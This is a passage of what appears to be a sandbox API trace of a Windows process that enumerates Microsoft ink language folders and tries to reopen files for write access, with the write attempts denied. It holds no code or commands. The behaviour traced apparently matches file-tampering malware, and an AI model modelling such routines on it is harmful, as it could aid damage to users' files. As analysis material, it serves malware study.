CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\LanguageModel\\chstic.dgml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\languagemodel\\chstic.dgml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0100.274] GetLastError () returned 0x5 [0100.275] GetLastError () returned 0x5 [0100.275] SetLastError (dwErrCode=0x5) [0100.275] GetLastError () returned 0x5 [0100.275] SetLastError (dwErrCode=0x5) [0100.275] GetLastError () returned 0x5 [0100.275] SetLastError (dwErrCode=0x5) [0100.275] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8cce0 | out: hHeap=0x20000) returned 1 [0100.429] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0100.429] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0100.429] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d790 | out: hHeap=0x20000) returned 1 [0100.429] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.429] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.429] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x327f510, ftCreationTime.dwHighDateTime=0x98, ftLastAccessTime.dwLowDateTime=0x327f498, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x5f430, ftLastWriteTime.dwHighDateTime=0x327f288, nFileSizeHigh=0x98, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="t ", cAlternateFileName="渘Ĉ㪀ā湈Ĉ蘿̧˻")) returned 0 [0100.429] FindClose (in: hFindFile=0x78150 | out: hFindFile=0x78150) returned 1 [0100.430] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0100.430] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35030 [0100.430] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0100.430] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35030 | out: hHeap=0x20000) returned 1 [0100.430] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a6f8 | out: hHeap=0x20000) returned 1 [0100.430] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.430] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a400 | out: hHeap=0x20000) returned 1 [0100.430] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0100.430] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0100.430] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46128 | out: hHeap=0x20000) returned 1 [0100.430] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0100.430] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0100.430] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0100.430] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0100.430] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0100.430] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35110 [0100.430] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0100.430] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35110 | out: hHeap=0x20000) returned 1 [0100.430] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0100.430] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5fd18 [0100.430] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0100.430] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6eb58 [0100.430] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fd18 | out: hHeap=0x20000) returned 1 [0100.430] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.430] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.430] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.430] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.430] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6eb58 | out: hHeap=0x20000) returned 1 [0100.430] AreFileApisANSI () returned 1 [0100.430] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\lt-LT", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\lt-LT", lpUsedDefaultChar=0x0) returned 57 [0100.430] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53520 [0100.430] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.430] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.430] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0100.431] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0100.431] AreFileApisANSI () returned 1 [0100.431] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0100.431] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a3b0 [0100.431] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x6a3b0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\lt-LT") returned 57 [0100.431] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\lt-LT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\lt-lt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0100.431] GetLastError () returned 0x5 [0100.431] GetLastError () returned 0x5 [0100.431] SetLastError (dwErrCode=0x5) [0100.431] GetLastError () returned 0x5 [0100.431] SetLastError (dwErrCode=0x5) [0100.431] GetLastError () returned 0x5 [0100.431] SetLastError (dwErrCode=0x5) [0100.431] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0100.431] AreFileApisANSI () returned 1 [0100.431] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0100.431] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a9b0 [0100.431] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x6a9b0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\lt-LT") returned 57 [0100.431] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\lt-LT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\lt-lt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0100.432] GetLastError () returned 0x5 [0100.432] GetLastError () returned 0x5 [0100.432] SetLastError (dwErrCode=0x5) [0100.432] GetLastError () returned 0x5 [0100.432] SetLastError (dwErrCode=0x5) [0100.432] GetLastError () returned 0x5 [0100.432] SetLastError (dwErrCode=0x5) [0100.432] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a9b0 | out: hHeap=0x20000) returned 1 [0100.432] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0100.432] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0100.432] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53520 | out: hHeap=0x20000) returned 1 [0100.432] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.432] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.432] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.432] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.432] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76098 [0100.432] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f798 [0100.432] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76098 | out: hHeap=0x20000) returned 1 [0100.432] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ec68 [0100.432] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f798 | out: hHeap=0x20000) returned 1 [0100.432] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa076ba6e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3a0736, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="lv-LV", cAlternateFileName="")) returned 1 [0100.432] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0100.432] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0100.432] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e470 [0100.432] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6eb58 [0100.432] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\lt-LT\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x78190 [0100.432] FindNextFileW (in: hFindFile=0x78190, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa076b52b, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3a0736, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0100.432] FindNextFileW (in: hFindFile=0x78190, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e933091, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e933091, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e933091, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2800, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0100.433] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6eb58 | out: hHeap=0x20000) returned 1 [0100.433] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.433] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.433] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0100.433] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.433] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0100.433] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.433] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.433] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.433] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.433] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e3e8 [0100.433] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x467b8 [0100.433] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ec68 | out: hHeap=0x20000) returned 1 [0100.433] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfd0 [0100.433] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35030 [0100.433] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0100.433] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35030 | out: hHeap=0x20000) returned 1 [0100.433] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0100.433] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350b0 [0100.433] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0100.433] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350b0 | out: hHeap=0x20000) returned 1 [0100.433] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.433] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0100.433] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.433] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x4ebc8 [0100.433] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0100.433] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.433] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8cce0 [0100.433] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0100.433] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.433] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.433] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.433] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.433] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8cce0 | out: hHeap=0x20000) returned 1 [0100.433] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.433] AreFileApisANSI () returned 1 [0100.433] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\lt-LT\\tipresx.dll.mui", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\lt-LT\\tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 73 [0100.433] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d580 [0100.434] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.434] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.434] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0100.434] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0100.434] AreFileApisANSI () returned 1 [0100.434] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d580, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0100.434] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x85da0 [0100.434] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d580, cbMultiByte=-1, lpWideCharStr=0x85da0, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\lt-LT\\tipresx.dll.mui") returned 73 [0100.434] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\lt-LT\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\lt-lt\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0100.434] GetFileType (hFile=0x27c) returned 0x1 [0100.434] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85da0 | out: hHeap=0x20000) returned 1 [0100.434] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0100.434] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0100.435] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0100.435] CloseHandle (hObject=0x27c) returned 1 [0100.435] AreFileApisANSI () returned 1 [0100.435] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d580, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0100.435] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x85940 [0100.435] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d580, cbMultiByte=-1, lpWideCharStr=0x85940, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\lt-LT\\tipresx.dll.mui") returned 73 [0100.435] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\lt-LT\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\lt-lt\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0100.435] GetLastError () returned 0x5 [0100.435] GetLastError () returned 0x5 [0100.435] SetLastError (dwErrCode=0x5) [0100.435] GetLastError () returned 0x5 [0100.435] SetLastError (dwErrCode=0x5) [0100.435] GetLastError () returned 0x5 [0100.435] SetLastError (dwErrCode=0x5) [0100.435] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85940 | out: hHeap=0x20000) returned 1 [0100.435] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0100.435] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0100.435] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d580 | out: hHeap=0x20000) returned 1 [0100.435] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.436] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.436] FindNextFileW (in: hFindFile=0x78190, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x327f510, ftCreationTime.dwHighDateTime=0x90, ftLastAccessTime.dwLowDateTime=0x327f498, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x8c700, ftLastWriteTime.dwHighDateTime=0x327f288, nFileSizeHigh=0x90, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="t ", cAlternateFileName="渘Ĉ㪀ā湈Ĉ蘿̧⠀")) returned 0 [0100.436] FindClose (in: hFindFile=0x78190 | out: hFindFile=0x78190) returned 1 [0100.436] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfd0 [0100.436] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35010 [0100.436] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0100.436] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35010 | out: hHeap=0x20000) returned 1 [0100.436] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e3e8 | out: hHeap=0x20000) returned 1 [0100.436] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.436] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e470 | out: hHeap=0x20000) returned 1 [0100.436] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0100.436] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0100.436] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x467b8 | out: hHeap=0x20000) returned 1 [0100.436] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0100.436] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f50 [0100.436] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0100.436] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f50 | out: hHeap=0x20000) returned 1 [0100.436] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfd0 [0100.436] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35210 [0100.436] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0100.436] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35210 | out: hHeap=0x20000) returned 1 [0100.436] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0100.436] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x60348 [0100.436] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0100.436] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0100.436] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60348 | out: hHeap=0x20000) returned 1 [0100.436] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.436] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.436] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.436] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.436] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0100.436] AreFileApisANSI () returned 1 [0100.437] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\lv-LV", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\lv-LV", lpUsedDefaultChar=0x0) returned 57 [0100.437] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0100.437] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.437] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.437] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 